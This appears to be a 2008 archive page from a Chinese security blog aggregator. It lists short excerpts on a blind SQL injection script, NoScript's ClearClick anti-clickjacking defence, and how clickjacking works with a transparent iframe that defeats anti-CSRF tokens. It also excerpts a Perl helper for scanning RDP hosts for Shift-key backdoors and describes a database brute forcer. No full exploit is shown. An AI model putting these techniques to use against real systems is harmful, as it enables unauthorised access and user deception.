Blind SQL Injection by Dichotomy Function
来源:Web安全手册
<?php
# Name -> Blind SQL Injection by Dichotomy Function
# Credits -> charles "real" F. <charlesfol[at]hotmail.fr>
# Date -> 13-04-08
阅读全文 »2008年10月 的日志
Hello ClearClick, Goodbye Clickjacking!
Finally NoScript 1.8.2.1 is out, featuring the announced new anti-clickjacking countermeasures enabled by default, independent from IFRAME and plugin content blocking settings.
The most specific and ambitious is called ClearClick: whenever you click or otherwise interact, through your mouse or your keyboard, with an embedded element which is partially obstructed, transparent or otherwise disguised, NoScript prevents the interaction from completing and reveals you the real thing in “clear”. At that point you can evaluate if the click target was actually the intended one, and decide if keeping it locked or unlock it for free interaction. This comes quite handy now that more dangerous usages of clickjacking are being disclosed, such as enabling your microphone or your webcam behind your back to spy you through the interwebs.
阅读全文 »
Clickjacking Details
来源:ha.ckers.org
Today is the day we can finally start talking about clickjacking. This is just meant to be a quick post that you can use as a reference sheet. It is not a thorough advisory of every site/vendor/plugin that is vulnerable – there are far too many to count. Jeremiah and I got the final word today that it was fine to start talking about this due to the click jacking PoC against Flash that was released today (watch the video for a good demonstration) that essentially spilled the beans regarding several of the findings that were most concerning. Thankfully, Adobe has been working on this since we let them know, so despite the careless disclosure, much of the work to mitigate this on their end is already complete.
阅读全文 »
Clickjacking猜想
作者:Monyer
最初看到有Clickjacking这个东西还是在大风那里,被人说的玄天玄地的,也不知道到底是个怎么样的东西。今天又看到一个demo,也不知道是真是假。但如果是真的,那么Clickjacking应该是这样一个东西:
阅读全文 »
Clickjacking太猥琐了
作者:刺
刚从青海回来,看到了一些Clickjacking的文章和demo,如果demo正确的话。
Clickjacking跟XSIO原理差不多,不过这个是弄个iframe设置为透明,然后用style控制别的元素的位置(z-index),比如伪造一个button。
这样当伪造的button漂浮在透明的iframe上时候,让人点击button,实际上就是点击了iframe里的那个链接。
所以当iframe指向某个网站时候,就可以欺骗用户去点击该网站里链接,所以anti-CSRF常常使用的token也会变得无效,因为这是用户自己的行为。
阅读全文 »
3389的SHIFT后门自动扫描[自动关闭错误连接]
鬼仔注:对3389的SHIFT后门自动扫描的补充
作者:cloie
#!/usr/bin/perl
use warnings;
use Win32::GUI;
use constant WM_CLOSE => 16;
sub monitor {
my $handle = Win32::GUI::FindWindow('', '中断远程桌面连接');
Win32::GUI::SendMessage($handle, WM_CLOSE, 0, 0);
}
阅读全文 »Scully: SQL DB interface and Brute Forcer
Scully is a brute forcer and a simple client interface to MSSQL and MYSQL Database servers. No more need to install database client libraries or setup ODBC connections in windows
What Does Scully do?
Scully is a client interface to MSSQL and MySQL database servers. No more need for
MSSQL/MySQL client libraries to be installed and no more need to setup an ODBC connection
either. Simply add IP/Hostname, username, password, port and database name and SQL away.
阅读全文 »
